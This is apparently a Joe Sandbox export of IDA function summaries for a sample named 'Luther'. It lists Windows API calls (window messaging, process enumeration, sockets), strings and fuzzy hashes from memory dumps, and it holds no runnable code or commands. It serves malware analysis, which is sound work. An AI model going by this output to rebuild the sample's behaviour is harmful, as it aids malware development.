                                                                                                          • Instruction ID: e336504c8a74a72920d29cda676db0a3d8d57f0050b0999ec78d3c258a286353
                                                                                                          • Opcode Fuzzy Hash: cdeef67b0d49121771e79254606a5fc16c3ac48a48c92991c8c9ddd224bd6f0c
                                                                                                          • Instruction Fuzzy Hash: 42319071214245AFDB218E38CC55FDA7BA9EB08338F206729F975B21D0C772AC529750
                                                                                                          APIs
                                                                                                            • Part of subcall function 00EB3DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00EB3AD4,?,?), ref: 00EB3DD5
                                                                                                          • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00EB3AD7
                                                                                                          • _wcslen.LIBCMT ref: 00EB3AF8
                                                                                                          • htons.WSOCK32(00000000,?,?,00000000), ref: 00EB3B63
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                          • String ID: 255.255.255.255
                                                                                                          • API String ID: 946324512-2422070025
                                                                                                          • Opcode ID: ed682ae11c31895cb33f7a232a8e80ac17171563df0c455580b9657b28a4339f
                                                                                                          • Instruction ID: 13d6d640d1c855b1c541dbc26fe8ae06e2f3142fdf7107b071a82d8324b87e57
                                                                                                          • Opcode Fuzzy Hash: ed682ae11c31895cb33f7a232a8e80ac17171563df0c455580b9657b28a4339f
                                                                                                          • Instruction Fuzzy Hash: 0B31A4356002019FCB20CF78C9C6EEABBE1EF54318F249159E916AB7A6D731EE45C760
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00EC49DC
                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00EC49F0
                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00EC4A14
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window
                                                                                                          • String ID: SysMonthCal32
                                                                                                          • API String ID: 2326795674-1439706946
                                                                                                          • Opcode ID: 40819b680e76f9f18d20291bcd2003d3cd5b8f93c6c597523bde30700fd999dd
                                                                                                          • Instruction ID: 6abb7c891f6be50a6402527584e990940e640dfc709ed0efefde8f1152bdb7f6
                                                                                                          • Opcode Fuzzy Hash: 40819b680e76f9f18d20291bcd2003d3cd5b8f93c6c597523bde30700fd999dd
                                                                                                          • Instruction Fuzzy Hash: 5F21A072500229ABDF118F50CC46FEA3BA5EB48718F111218FA157B0D0D6B2A8569B90
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00EC51A3
                                                                                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00EC51B1
                                                                                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00EC51B8
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$DestroyWindow
                                                                                                          • String ID: msctls_updown32
                                                                                                          • API String ID: 4014797782-2298589950
                                                                                                          • Opcode ID: 97d9e498284496b8d992759ffa7ebe68ac0cbc93491b1b2a58ddd862ca91e6c7
                                                                                                          • Instruction ID: 11b257e6db3dfff9128deb5ecb26e16bf40b8afc7bc02f4fdca9c20229e7dcd2
                                                                                                          • Opcode Fuzzy Hash: 97d9e498284496b8d992759ffa7ebe68ac0cbc93491b1b2a58ddd862ca91e6c7
                                                                                                          • Instruction Fuzzy Hash: E2218EB6601609AFDB10DF14CD85EA737EDEB59368B04105DFA00AB361CB32EC42DBA0
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00EC42DC
                                                                                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00EC42EC
                                                                                                          • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00EC4312
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$MoveWindow
                                                                                                          • String ID: Listbox
                                                                                                          • API String ID: 3315199576-2633736733
                                                                                                          • Opcode ID: 106dc8563b28aaddce18f14b527c6216a9864d3f0483f8d2d693d1c1e14167f3
                                                                                                          • Instruction ID: 0e2a27841b668e30f4e831e791d711d9fb24f3e12a967aea3d523636fdeef060
                                                                                                          • Opcode Fuzzy Hash: 106dc8563b28aaddce18f14b527c6216a9864d3f0483f8d2d693d1c1e14167f3
                                                                                                          • Instruction Fuzzy Hash: 2921B372604218BBEF158F94CD85FAB3B6EEB89754F119129F900AB1E0C6729C52C7A0
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 00EA544D
                                                                                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00EA54A1
                                                                                                          • SetErrorMode.KERNEL32(00000000,?,?,00ECDCD0), ref: 00EA5515
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$InformationVolume
                                                                                                          • String ID: %lu
                                                                                                          • API String ID: 2507767853-685833217
                                                                                                          • Opcode ID: 9027b2221bdd79f108a8e7ce7e189de3dfc3802f8391830b251147a9d97c1cbc
                                                                                                          • Instruction ID: 142db8cd41193ce849c2d6b885469a370c329eaf9a2f4d2952a877424df9d9ed
                                                                                                          • Opcode Fuzzy Hash: 9027b2221bdd79f108a8e7ce7e189de3dfc3802f8391830b251147a9d97c1cbc
                                                                                                          • Instruction Fuzzy Hash: 97314675A00209AFDB10DF54C985EAABBF8EF09304F1490A9F509EB262D771ED45CB61
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00EC4CED
                                                                                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00EC4D02
                                                                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00EC4D0F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend
                                                                                                          • String ID: msctls_trackbar32
                                                                                                          • API String ID: 3850602802-1010561917
                                                                                                          • Opcode ID: d5b4bccfeb06b1d9925b7beb2934cb75357a2cbd3017968dfc4b96b10ac277ee
                                                                                                          • Instruction ID: 4c2b0c17db65162ada6186169e0378b8bf5e9fa0bd2eba8dfca72af091986a7f
                                                                                                          • Opcode Fuzzy Hash: d5b4bccfeb06b1d9925b7beb2934cb75357a2cbd3017968dfc4b96b10ac277ee
                                                                                                          • Instruction Fuzzy Hash: 0811E7B1240248BEEF215F65CC06FAB7BE8EF85769F111529FA51F20E0C672DC519B10
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E38577: _wcslen.LIBCMT ref: 00E3858A
                                                                                                            • Part of subcall function 00E936F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00E93712
                                                                                                            • Part of subcall function 00E936F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E93723
                                                                                                            • Part of subcall function 00E936F4: GetCurrentThreadId.KERNEL32 ref: 00E9372A
                                                                                                            • Part of subcall function 00E936F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00E93731
                                                                                                          • GetFocus.USER32 ref: 00E938C4
                                                                                                            • Part of subcall function 00E9373B: GetParent.USER32(00000000), ref: 00E93746
                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00E9390F
                                                                                                          • EnumChildWindows.USER32(?,00E93987), ref: 00E93937
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                          • String ID: %s%d
                                                                                                          • API String ID: 1272988791-1110647743
                                                                                                          • Opcode ID: d02a9e6b3cfd408a3917ec2fb232fcc0aad5115be468da7638870469b3b95ce1
                                                                                                          • Instruction ID: 01f879b3b1e8994ea0292acefdcc791228f667cb5a3817b2c0b3c64c2803e022
                                                                                                          • Opcode Fuzzy Hash: d02a9e6b3cfd408a3917ec2fb232fcc0aad5115be468da7638870469b3b95ce1
                                                                                                          • Instruction Fuzzy Hash: F211D5B56002056BCF01BF749D85FEE77A9AF94304F009079F949BB296CE729946CB20
                                                                                                          APIs
                                                                                                          • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00EC6360
                                                                                                          • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00EC638D
                                                                                                          • DrawMenuBar.USER32(?), ref: 00EC639C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$InfoItem$Draw
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 3227129158-4108050209
                                                                                                          • Opcode ID: 55f82bafa214361a3a3dc385111cc5b74e1965bfc3d28add828052443a75ef01
                                                                                                          • Instruction ID: 15a1e6a951ebecb0cf18d97848220a2d22210fdf0f6d1caa44df980517119278
                                                                                                          • Opcode Fuzzy Hash: 55f82bafa214361a3a3dc385111cc5b74e1965bfc3d28add828052443a75ef01
                                                                                                          • Instruction Fuzzy Hash: 6D017972504248AFDB119F55DD84FAA7BB4EB44315F1080A9E809A6151CB328A8AEF21
                                                                                                          APIs
                                                                                                          • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00E8E797
                                                                                                          • FreeLibrary.KERNEL32 ref: 00E8E7BD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressFreeLibraryProc
                                                                                                          • String ID: GetSystemWow64DirectoryW$X64
                                                                                                          • API String ID: 3013587201-2590602151
                                                                                                          • Opcode ID: 991fa7e4fcb2174a5a2aac6d3e72f0027f4aca7fea40d5248decb356f4719d57
                                                                                                          • Instruction ID: 6c10fbbc1f51f41a911bf2610a0e98fb4191426288682de638e2627b56875d02
                                                                                                          • Opcode Fuzzy Hash: 991fa7e4fcb2174a5a2aac6d3e72f0027f4aca7fea40d5248decb356f4719d57
                                                                                                          • Instruction Fuzzy Hash: 77E022B1D0A6209FD77266205C88EEA33246F20B01B292679F80EF6350EB26CC499794
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b8ba6d32fa022360c6b5e0e26cf9b93d29aedb1f493ce691156716ee6ece2ae6
                                                                                                          • Instruction ID: 797640f3476ab2b9403919a66098adf478b9fa99074af63499b7b52d16d798c7
                                                                                                          • Opcode Fuzzy Hash: b8ba6d32fa022360c6b5e0e26cf9b93d29aedb1f493ce691156716ee6ece2ae6
                                                                                                          • Instruction Fuzzy Hash: 96C17C75A0020AEFDB14CF94C884EAEB7B5FF48708F609598E905EB251D771EE81DB90
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __alldvrm$_strrchr
                                                                                                          • String ID:
                                                                                                          • API String ID: 1036877536-0
                                                                                                          • Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                          • Instruction ID: 0c6121b2e700e66d827e3d0c6bb9ada01b61049c9822f198bdc289a3cfd36556
                                                                                                          • Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                          • Instruction Fuzzy Hash: A0A19AB29803869FDB21DF18E8927AEBBE0EF11398F24516DE5A5BB3C1C6348D41C750
                                                                                                          APIs
                                                                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00ED0BD4,?), ref: 00E90EE0
                                                                                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00ED0BD4,?), ref: 00E90EF8
                                                                                                          • CLSIDFromProgID.OLE32(?,?,00000000,00ECDCE0,000000FF,?,00000000,00000800,00000000,?,00ED0BD4,?), ref: 00E90F1D
                                                                                                          • _memcmp.LIBVCRUNTIME ref: 00E90F3E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FromProg$FreeTask_memcmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 314563124-0
                                                                                                          • Opcode ID: 9e32edc21a9883cb3b91df986770ce09fee1e8f27f8d55089bd82b2909fe2170
                                                                                                          • Instruction ID: e1e59eeb99f7eeceb2b7f6c4754a2b7f8d2368cac07f94670513c87ced8edc80
                                                                                                          • Opcode Fuzzy Hash: 9e32edc21a9883cb3b91df986770ce09fee1e8f27f8d55089bd82b2909fe2170
                                                                                                          • Instruction Fuzzy Hash: 1981F571A00109AFCF14DF94C988EEEB7B9FF89315F204599E516BB250DB71AE06CB60
                                                                                                          APIs
                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00EBB10C
                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00EBB11A
                                                                                                            • Part of subcall function 00E3B329: _wcslen.LIBCMT ref: 00E3B333
                                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 00EBB1FC
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00EBB20B
                                                                                                            • Part of subcall function 00E4E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00E74D73,?), ref: 00E4E395
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1991900642-0
                                                                                                          • Opcode ID: d80a50e3a9b594be3b58129c333deb74ba1d5650cda1de93a069698d979502ca
                                                                                                          • Instruction ID: 88c039e857d60456c3ef5826f2a503a8e39612f032f3f2317298920ece890c51
                                                                                                          • Opcode Fuzzy Hash: d80a50e3a9b594be3b58129c333deb74ba1d5650cda1de93a069698d979502ca
                                                                                                          • Instruction Fuzzy Hash: 86514CB1508300AFD310EF25CC8AA6BBBE8FF88754F40592DF585A7251EB71E905CB92
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _free
                                                                                                          • String ID:
                                                                                                          • API String ID: 269201875-0
                                                                                                          • Opcode ID: 089572a106cf5a99f8b790ca8f3b9f6f987b436eea0bae60bea97cdef7b8f9a7
                                                                                                          • Instruction ID: 7284c7d043c47222192ae9c60858da4027f2f7ea084dd8b01af8846d7823ecb2
                                                                                                          • Opcode Fuzzy Hash: 089572a106cf5a99f8b790ca8f3b9f6f987b436eea0bae60bea97cdef7b8f9a7
                                                                                                          • Instruction Fuzzy Hash: 2E415E31640300ABEB287EBD9C46ABE36E9EF02770F14A5A6F81CF7191DA75480153A3
                                                                                                          APIs
                                                                                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 00EB255A
                                                                                                          • WSAGetLastError.WSOCK32 ref: 00EB2568
                                                                                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00EB25E7
                                                                                                          • WSAGetLastError.WSOCK32 ref: 00EB25F1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$socket
                                                                                                          • String ID:
                                                                                                          • API String ID: 1881357543-0
                                                                                                          • Opcode ID: 15fdaf3fb405f65e041ce7bad6a71ef692f768e6ed4bbd206c3698e6c247bd8f
                                                                                                          • Instruction ID: 253ed0eadc76dfbbbf9bd6be8fa10c96a4be7bc6ae8b9c5c25a5d2b90e853933
                                                                                                          • Opcode Fuzzy Hash: 15fdaf3fb405f65e041ce7bad6a71ef692f768e6ed4bbd206c3698e6c247bd8f
                                                                                                          • Instruction Fuzzy Hash: 3441D474A00200AFE720AF24C88AF667BE5AF04758F54D49CF655AF6D2C772ED42CB91
                                                                                                          APIs
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00EC6D1A
                                                                                                          • ScreenToClient.USER32(?,?), ref: 00EC6D4D
                                                                                                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00EC6DBA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
